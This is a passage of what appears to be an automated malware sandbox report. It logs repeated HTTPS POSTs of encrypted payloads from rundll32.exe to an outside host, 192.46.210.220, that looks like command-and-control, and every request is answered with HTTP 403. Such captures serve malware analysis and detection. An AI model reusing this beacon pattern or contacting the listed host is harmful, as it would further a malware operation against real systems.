                                                                                                        2021-10-28 03:05:38 UTC266OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:39 UTC271INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:39 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.350013192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:39 UTC271OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:39 UTC271OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:40 UTC276INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.350019192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:42 UTC276OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:42 UTC276OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:43 UTC281INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:43 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.350021192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:43 UTC281OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:43 UTC281OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:44 UTC286INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.350034192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:46 UTC286OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:46 UTC286OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:47 UTC291INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:47 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.350039192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:47 UTC291OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:47 UTC291OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:48 UTC296INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.349770192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:00 UTC29OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:00 UTC29OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:01 UTC39INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        60192.168.2.350057192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:50 UTC296OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:50 UTC296OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:51 UTC301INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:51 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        61192.168.2.350061192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:51 UTC301OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:51 UTC301OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:52 UTC306INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        62192.168.2.350067192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:54 UTC306OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:54 UTC306OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:55 UTC311INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:55 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        63192.168.2.350069192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:55 UTC311OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:55 UTC311OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:56 UTC316INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:55 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        64192.168.2.350075192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:58 UTC316OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:58 UTC316OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:59 UTC321INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        65192.168.2.350077192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:59 UTC321OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:59 UTC321OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:59 UTC326INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        66192.168.2.350083192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:06:02 UTC326OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
